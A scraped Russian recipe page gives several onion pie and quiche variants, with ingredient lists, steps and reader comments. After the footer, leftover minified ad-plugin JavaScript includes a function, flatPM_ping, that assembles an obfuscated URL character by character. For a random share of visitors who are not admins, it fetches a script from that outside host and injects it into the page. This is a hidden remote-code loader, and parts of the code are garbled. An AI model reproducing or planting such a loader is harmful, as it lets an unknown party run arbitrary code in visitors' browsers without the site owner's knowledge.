Пирог из лука

Луковый пирог: классический французский рецепт

Хотите приготовить простое и одновременно изысканное угощение? Тогда обратите внимание на луковый пирог. Рецепт классический французский несладкой выпечки подается в качестве закуски. Также он отлично гармонирует с кофе или чаем. Чтобы вы могли подобрать для себя лучший рецепт, предлагаем несколько разных вариантов. Каждый из них по-своему хорош и заслуживает стать излюбленным угощением для всей семьи.

Киш французский классический

Наверняка вам приходилось слышать название «Киш». За незнакомым словом французского происхождения скрывается обычный луковый пирог. Рецепт классический будем готовить на основе базового теста для выпечки и начинки из карамелизированного лука.

Состав:

  • 460 гр. муки универсальной;
  • 320 гр. сливочного масла;
  • 160 гр. воды;
  • 5 гр. соли;
  • 180 мл. сливок;
  • 300 гр. лука;
  • 120 гр. сыра проволоне;
  • 30 мл. оливкового масла;
  • 3 яйца;
  • 180 мл. молока;
  • ½ ч. л. перца.

Киш французский классический

Как готовить:

  1. Для теста смешайте муку с солью (1 гр.).
  2. Холодное масло нарежьте кусочками. Смешайте масло с мукой до образования мелкой крошки.
  3. Воду используйте ледяную. Добавьте указанное количество, замешайте тесто.
  4. Посыпьте мукой рабочую поверхность, переложите тесто на небольшой слой муки. Быстрыми движениями сформируйте плоский прямоугольник.
  5. Оберните пленкой пищевой тесто, положите в холодильник на 30 минут.
  6. Пока тесто охлаждается, приготовьте начинку на луковый пирог. Рецепт с фото начните с шинковки лука ломтиками.
  7. Разогрейте в сковороде 30 мл. оливкового масла и 20 гр. сливочного.
  8. Добавьте лук, обжаривайте на слабом огне до золотисто-коричневого цвета.
  9. Взбейте венчиком яйца, добавьте сливки и молоко. Посолите, поперчите, взбейте.
  10. Достаньте тесто из холодильника. Раскатайте пласт на противень из расчета: 28 гр. на 3 см. Выложите на емкость для выпечки, разровняйте так, чтобы образовались бортики.
  11. Выложите классическую начинку на французский луковый пирог. Рецепт с фото практически готов.
  12. Осталось влить яично-сливочную смесь на луковую начинку. Слегка помогите вилкой распределить начинку равномерно.
  13. Выпекайте при температуре 175 градусов 35 минут.
  14. Достаньте противень, посыпьте тертым сыром проволоне.
  15. Поставьте выпекаться еще на 10 минут.
  16. Подавать пирог можно как горячим или теплым, так и холодным.

Ароматный луковый пирог с помидорами

Предлагаем приготовить замечательную альтернативу классике – с помидорами луковый пирог. Рецепт с фото пошагового выполнения прилагаем. Следуя простым рекомендациям, вы с легкостью выполните каждую технологию и насладитесь ароматной выпечкой. Несладкое блюдо покорит вкусы даже требовательных гурманов.

Состав:

  • 320 гр. охлажденного сливочного масла;
  • 460 гр. муки высшего сорта;
  • 10 гр. соли;
  • 160 гр. ледяной воды;
  • 180 мл. сливок;
  • 3 яйца;
  • 180 мл. молока;
  • 300 гр. помидоров;
  • 300 гр. лука-порея;
  • Эстрагон или базилик – 6 гр. (2 ст. л.).;
  • ½ ч. л. мускатного молотого ореха;
  • 120 гр. эмментальского сыра.

Ароматный луковый пирог с помидорами

Как готовить:

    1. Заместите тесто на луковый пирог. Пошаговый рецепт с фото выполняется быстрыми, уверенными движениями.
    2. Насыпьте на рабочую поверхность муку.
    3. Положите холодное масло на муку, порубите мелко ножом.
    4. Добавьте 1 грамм соли, перетрите ингредиенты в мелкую крошку.
    5. Добавьте воду ледяную, замесите тесто.
    6. Оберните тесто пленкой, отправьте охлаждаться.
    7. Приготовьте из томатов конкасе. Для этого ошпарьте томаты, снимите шкурку, нарежьте мелкими кубиками.
    8. Нашинкуйте белую и зеленую часть лука-порея на луковый пирог.
    9. Рецепт классический французский предполагает использование сливочного масла (20 гр.) для обжаривания.
    10. Когда лук обретет полупрозрачную структуру, добавьте помидоры.
    11. Тушите, пока не выпарится жидкость.
    12. Измельчите свежий базилик (если свежего нет, используйте сушеный) и добавьте к луку.
    13. Взбейте яйца со щепоткой соли.
    14. Добавьте молоко, сливки, остальную соль.
    15. Добавьте тертый мускатный орех и измельченного базилика 2 столовые ложки.
    16. Приготовьте противень с глубокими бортиками на луковый пирог.

Рецепт классический предусматривает использование круглой формы. Но также можно брать прямоугольную или квадратную.

  • Раскатайте тесто, выложите на противень, оформите бортики.
  • Разложите по всей площади луково-помидорную начинку.
  • Влейте аккуратно яично-сливочную заправку.
  • Запекайте при температуре 175 градусов 35 минут.
  • Посыпьте тертым сыром, выпекайте еще 10 минут.
  • Проверьте готовность ножом, вставив его в середину. Если выходит чистым – пирог готов.

Луковый пирог с беконом

Его аромат способен свести с ума. Обязательно попробуйте с беконом луковый пирог. Пошаговый рецепт с фото расписываем в деталях, чтобы даже новички сумели приготовить блюдо ресторанного уровня в домашних условиях.

Состав:

  • Сливочное масло – 100 гр.;
  • Мука – 230 гр.;
  • Соль – щепотка;
  • Сметана – 1 ст. л.;
  • Яйцо – 3 шт.;
  • Бекон – 250 гр.;
  • Лук – 200 гр.;
  • Молоко – 100 мл.;
  • Сыр твердый – 150 гр.;
  • Сливки – 200 мл.;
  • Мускатного ореха щепотка;
  • Черный перец по вкусу.

луковый пирог рецепт классический французский

Как готовить:

  1. В миску насыпьте муку. В муку натрите холодное сливочное масло.
  2. Добавьте 1 яйцо, 1 ложку сметаны, соль.
  3. Замесите быстрыми движениями тесто на луковый пирог. Рецепт классический французский немного отличается, это тесто выходит более сдобным и очень нежным.
  4. Оберните тесто пленкой, положите охлаждаться.
  5. Тем временем подготовьте начинку.
  6. Почистите лук, нашинкуйте тонкими полукольцами.
  7. Тонкими кусочками нарежьте бекон.
  8. Обжарьте кусочки бекона до хрустящей структуры.
  9. Извлеките на тарелку.
  10. На растопленном жире от бекона и 30 гр. сливочного масла обжарьте лук до румяного цвета.
  11. Добавьте кусочки бекона, мускатный орех, соль, перец, перемешайте.
  12. Пока начинка остывает, приготовьте заливку из взбитых яиц, молока, сливок, щепотки соли.
  13. Раскатайте охлажденное тесто в пласт под форму для выпекания. Не забудьте оформить бортики.
  14. Выложите начинку из лука и бекона, залейте сливочной смесью, поставьте выпекаться.
  15. Оптимальная температура – 180 градусов. Через 30 минут посыпьте верх пирога тертым сыром и допеките до готовности и румяной корочки.

Луковый пирог рецепт с грибами

Для тех, кто любит экспериментировать, предлагаем испечь с грибами ароматный луковый пирог. Рецепт классический готовится на слоеном тесте. Мы же будем использовать вариацию песочного. Оно готовится проще, быстрее, не требует особых кулинарных навыков. При этом получается готовое блюдо просто замечательным.

Луковый пирог

Превосходен для праздника, хотя и выглядит буднично.

Самый страшный ужас детства – лук — превратился для меня в самую большую любовь. И все благодаря луковым пирогам. Это чудо французской кухни буквально покорило меня.

Лук в этих пирогах совсем не похож на тот скучный продукт, который надо «выковыривать», как в детстве (если, не да бог, попадается). В нем нет ничего острого, горького или сильно пахнущего, это совсем другой вкус, другой аромат и структура.

Луковый пирог имеет чуть сладкую, карамельную начинку и хрустящее тесто. Это очень вкусно. Такой пирог хорошо подавать с белым вином как закуску.

Рассчитано на форму диаметром 28 см:

Ингредиенты

  • 750 г лука
  • 80 г сливочного масла
  • 2 яйца
  • 70 г сыра «Грюйер» (можно заменить Чеддером)
  • 0,5 ч.л. соли
  • черный молотый перец
  • 125 г муки пшеничной
  • 100 г холодного сливочного масла
  • 5 ст.л. ледяной воды
  • щепотка соли
  • мука для раскатывания теста

Приготовление

Лук почистите и положите в холодную воду на полчаса. Периодически воду лучше менять. Тогда при нарезании и тушении лука плакать не придется. Разрежьте луковицы вдоль пополам, а затем нарежьте лук тонкими полукольцами. Большие луковицы можно нарезать четвертинками. Положите лук в сковороду вместе с маслом, накройте крышкой и поставьте на небольшой огонь.

Тушите лук на небольшом огне примерно час-час с четвертью, периодически помешивая, пока лук не станет мягким (время тушения сильно зависит от типа плиты, толщины сковороды и других обстоятельств, поэтому следите). Если надо, в процессе подлейте немного воды. Лук ни в коем случае не должен хрустеть. Он должен стать чуть сладким и очень мягким, глубоко протушенным (если так можно сказать). Поставьте остыть.

Для основы надо сделать песочное тесто. Для этого в муку надо добавить соль и положить охлажденное масло.

Ножом порубите масло с мукой в крошку. Если не получается хорошо порубить, разотрите крупные кусочки масла с мукой пальцами.

Добавьте в крошку воды и быстро замесите тесто руками. Тесто готово, как только вся мука вмешалась, и оно собралось в шар, поэтому долго тесто не месите, оно станет липким и с ним трудно будет работать. Заверните тесто в пленку и уберите в холодильник минимум на полчаса.

Разогрейте духовку до 180 градусов. Достаньте тесто из холодильника. Тесто и доску посыпьте мукой и раскатайте тесто в тонкий пласт диаметром чуть больше формы.

Переложите тесто в форму. Тесто должно быть очень пластичным и должно легко перенестись в форму. Расправьте тесто, формируя бортики. Наколите дно формы вилкой, чтобы тесто в процессе выпечки не вздулось.

В охлажденный лук добавьте натертый сыр, соль, перец и яйца, хорошо все перемешайте.

Выложите луковую начинку в форму и разровняйте. Поставьте форму в духовку на средний уровень.

Выпекайте примерно 35 минут, пока пирог не подрумянится, тесто по кроям тоже должно стать более темным.
Вот и все. Остудите и угощайтесь.

Луковый пирог

Время подготовки: 20 мин.

Время приготовления: 25 мин.

Кол-во порций: 8 шт.

Ингредиенты

Как приготовить луковый пирог

Луковый пирог — очень сытное, полезное и вкусное блюдо. В качестве начинки в большом количестве репчатый лук используется довольно редко, и совершенно зря! Этот нежный пирог тому явное доказательство.

Варианты выпечки с луковой начинкой встречаются во многих странах, и каждый народ добавляет дополнительно другие ингредиенты, свойственные их национальной кухне: немцы — копчёную грудинку, болгары — брынзу и паприку, итальянцы — анчоусы и маслины, французы — ветчину или вяленую рыбу и т.д. Основой для лукового пирога может быть: дрожжевое, песочное или слоёное тесто.

Подайте этот замечательный пирог к обеду или нарежьте порционно и захватите с собой на пикник!

Как приготовить “Луковый пирог” пошагово с фото в домашних условиях

Для приготовления слоёного лукового пирога нам потребуется: готовое (домашнее или покупное) слоёное тесто бездрожжевое, репчатый лук (можно взять красный), яйца, сметана, сыр, чёрный перец и растительное масло. За 1-1,5 часа до готовки разморозьте при комнатной температуре слоёное тесто (или подготовьте его в соответствии с инструкцией).

Приготовление пирога необходимо начать с очистки 3 крупных луковицы от шелухи и нарезанием их полукольцами. В растительном масле обжарить лук до золотистого цвета. Приправьте лук в процессе обжарки молотым чёрным перцем, 2 щепотками.

Готовим заливку для пирога с луком на сметане — взбиваем 3 яйца куриных со сметаной (4 ст. л.). Лучше всего это сделать венчиком.

Натираем на крупной тёрке твёрдый сыр (100 г) и добавляем его к яичной смеси — тщательно перемешиваем.

2/3 от размороженного слоёного теста раскатать и уложить в форму, сформировать небольшие бортики, высотой 3-4 см, а излишки теста обрезать.

Далее просто выкладываем на тесто обжаренный лук.

Затем равномерно распределяем яично-сырную заливку. Бортики нужно загнуть к центру.

Нарезать полосками остатки теста и уложить крест-накрест, в виде сетки. Сетку можно смазать остатками яичной заливки или 1 яичным желтком. Чтобы делать такие аккуратные полоски для пирога, смажьте пальцы рук мукой.

Выпекать луковый пирог в разогретой до 220°С духовке 25-30 минут. Подавать как тёплым, так и холодным. Приятного аппетита!

Рекомендуем

Отзывы (22):

Я готовила луковый пирог с другим тестом. Но ваш рецепт проще. Готовое тесто купил – и радуй близких такой вкуснятиной. Обязательно испеку пирог с луком по вашему рецепту.

я часто готовлю пироги из слоеного теста, но с луком не пробовала, обязательно поэкспериментирую

получилось не вкусно(( пришлось выбросить :_(

странно,а я второй раз готовлю,нам нравится

я уже раз четвертый готовлю. Супер!

Ochen’ vkusnií. Tol’ko u menja donishko ne sovsem propeklos’

как по мне, так три яйца много, в следующий раз сделаю с двумя. а так быстро, вкусно и дешево. Я бы сказало на скорую руку.

вкусно и муж рад : ) проглотил три куска, не задумываясь : )))

Я этот пирог знаю давно, с тех пор, когда не было готового теста. Получается гораздо вкуснее, чем с готовым. Тесто: трем на крупной терке пачку маргарина, добавляем 9 столовых ложек сметаны, можно не жирной, соль, сода, гашеная уксусом и мука. Столько, чтобы тесто хорошо раскатывалось и не прилипало. Пассеруем лук на растительном масле, только побольше 5-6 больших луковиц нарезанных крупными кольцами и полукольцами. пока не станет мягким. Тесто раскатываю с запасом и кладу его в форму со съемным дном.Выкладываю лук и заливаю заливкой. Заливка: 5 столовых ложек сметаны, 3 сырых яйца, 80 г любого твердого сыра, потертого на крупную терку. Заворачиваю края теста, чтобы середина оставалась открытой и в духовку. В былые времена ко мне в гости приходили ради этого пирога. Безпроигрышный вариант, пекла его и продолжаю печь бесчисленное число раз. И никогда не было неудачи.

А солить заливку или лук надо?

Получилось не вкусно. Начинка получилась как омлет с луком.

Муж очень привиредлив, но и ему очень понравился. Вкуснотища. Беру тесто дрожжевое слоеное от Юли Высоцкой.

Подскажите пожалуйста какого диаметра ваща форма, или на какие диаметры хватает данного кол-ва теста ? Спасибо.

у меня была 23 см

Очень хороший постный луковый пирог, кстати также очень легкий в приготовлении, что не может не радовать. Спасибо за рецепт.

Спасибо за рецепт готовить его очень легко и просто. Постараюсь в следующий раз опубликовать фото отчет своего лукового пирога.

Я считаю что это лучший рецепт лукового пирога. Очень легко делается, тем более когда тесто покупаешь в магазине. А подготовить лук на сковороде это легче простого.

Брала 1 яйцо и смешивала 2 вида сыра, один из которых пармезан. Великолепный вкус! Можно ещё зелень добавить, тоже пробовала

спасибо за отзыв. Присылайте ещё фото-отчет!

Луковый пирог.

Наверное один из самых любимых мною несладких пирогов.

Если смотреть по французской классификации — то это классический киш (фр. quiche), более всего похожий на эльзасский. Основная разница в том, что в эльзасском используется лук порей, а в этом обычный репчатый лук.

В принципе, вариантов начинки может быть множество. Например баклажаны, брокколи, перец, подвяленнные помидоры, причем все это в разных сочетаниях — это если речь идет об овощных кишах. Можно добавлять бекон, грудинку сыр, причем как-то раз ел такой луковый киш с добавлением сыра с голубой плесенью. Понравилось, хотя я к такому сыру равнодушен. Да мало ли какие сочетания продуктов подскажет вам ваша фантазия. Главное это тесто, нечто среднее между слоеным и песочным, и сама технология приготовления киша.

Пирог получается замечательный, причем и как самостоятельное блюдо, так и в качестве дополнения к другим блюдам. Или как вариант закуски. Съесть его можно много. И не надоедает.

Количество ингредиентов дано в расчете на полторы дозы. Этого как раз хватает на стандартную форму Ø24 см. Удобнее всего использовать разъемную.

Важно! Вкус, текстура и внешний вид теста, особенно теста, как, впрочем, и начинки, очень зависит от качества сметаны, сливочного масла и муки. Та сметана крупных производителей, которая продается во всех российских магазинах, ведет себя ниже всякой критики. Как, впрочем, и обычное сливочное масло. Постарайтесь приобрести действительно хорошие продукты. Если кому интересно — для своей семьи я приобретаю сметану и масло из калужской области — Медынь. Благо их можно найти в магазинах.

Для лукового пирога понадобится:

Тесто

  • Сливочное масло. 200 грамм.
  • Мука 1½ стакана.
  • Сметана 25% жирности. 5 столовых ложек.
  • Соль. ½ чайной ложки.
  • Сахар ¼ чайной ложки.

Начинка

  • Репчатый лук. 7-8 крупных луковиц. Примерно 1½ кг.
  • Сметана. 25% жирности. 200 грамм (1 стакан)
  • Яйца. 6 шт.
  • Соль. ½ чайной ложки.
  • Черный свежемолотый перец. ½ чайной ложки.
  • Красный острый молотый перец — в зависимости от желаемой остроты. от ¼ чайной ложки.
  • Сахар. При несладком луке. 1 чайная ложка без горки.

Идеальным вариантом будет, если взять белый салатный лук. Но, чаще всего в доме бывает лук обычный. Он также подходит для такого пирога, но при приготовлении начинки нужно будет добавить в нее немного сахара. С красным луком делать не пробовал ни разу, думаю, что он также подойдет

Приготовление лукового киша

Готовим тесто:

Просеиваем муку с солью в миску добавляем размягченное масло. Я сделал так: масло из холодильника натер на крупной терке и потом выложил его в муку. Пока идет этот процесс, стружки масла после терки быстро успевают нагреться до комнатной температуры.

Рубим масло с мукой ножом до равномерного перемешивания.

Добавляем в тесто 5 столовых ложек сметаны.

И снова рубим ножом до состояния гладкого теста без каких-либо комочков.

Скатываем тесто в шар, закрываем пленкой или кладем шар в полиэтиленовый пакет и убираем в холодильник минимум на 2 часа. Лучше оставить его часа на 4. Или вообще на ночь.

Готовим начинку:

Нарезаем лук полукольцами, не очень тонко — миллиметра по 3 толщиной.

В глубокой и широкой сковороде или широком сотейнике, в небольшом количестве сливочного масла и на достаточно сильном огне «прихватываем» лук.
Лук нужно не зажарить до хруста, а притомить до начала карамелизации. Для этого немного присаливаем лук в сковороде и, в случае несладкого лука, добавляем сахар примерно 1 чайную ложку.

Помешивая, доводим лук до прозрачности, и , убавив огонь продолжаем его томить.

Основных целей две. Во-первых нужно, чтобы лук начал карамелизоваться. Во-вторых нужно по-максимуму выпарить излишки влаги из лука. Когда лук начал менять цвет, темнеть и карамелизоваться, снимаем сковороду с огня и оставляем до полного остывания.

В подходящую миску разбиваем все 6 яиц. Добавляем соль, черный и красный молотые перцы и 200 грамм сметаны.

Венчиком размешиваем все содержимое миски до полной однородности.

Для начинки все приготовлено.

Делаем пирог

Достаем тесто из холодильника. Дно формы подпыляем мукой или можно воспользоваться пекарской бумагой.

Выкладываем тесто в форму, формируя достаточно высокие бортики. Делаем вилкой частые проколы в тесте.

Лук из сковородки выкладываем в форму и равномерно распределяем по всей площади теста.

Сверху выливаем яично-сметанную смесь.

Очень аккуратно вилкой расшевелеваем лук под жидкостью, главное не задеть тесто и не порвать его и в то же время дать яйцам со сметаной проникнуть в слой лука.

Как вариант — можно предварительно смешать лук со смесью, и все это сразу выложить на тесто. Этот вариант хоть и проще — но хуже, пирог получается менее красивым.

Ставим пирог в разогретую до 200°С духовку примерно на 30-40 минут.

Когда пирог станет золотистым и тесто хорошо пропечется — вытаскиваем пирог из духовки.

Даем ему немного остыть и вытаскиваем пирог из формы.

Если вылезать из формы он не хочет, хотя это практически нереально — в тесте много масла и прилипнуть к форме пирогу проблематично, то можно сделать следующее. Тонким ножом проводим между пирогом и стенками формы. Накрываем форму чем-либо плоским и твердым — например большим блюдом или просто разделочной доской, главное, чтобы своеобразная крышка закрывала по площади всю форму. Удерживая форму с получившейся крышкой, переворачиваем форму — пирог выпадет на эту крышку.

Будьте очень аккуратны — верхняя часть достаточно мягкая, пока горячая, так что пирог может несколько потерять во внешнем виде. Потом, убрав ненужную уже форму, накрываем пирог блюдом для сервировки и снова переворачиваем. Поэтому разъемная форма предпочтительнее.

Или, как вариант, можно выстелить дно большим листом пекарской бумаги, так, чтобы бумага свисала со стенок формы с двух сторон. Тогда, по готовности пирога, можно, схватившись за эту бумагу спокойно вынуть пирог из формы.

После чего подаем к столу.

Но, стоит напомнить, что, как это часто бывает, после полного остывания этот пирог намного вкуснее.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};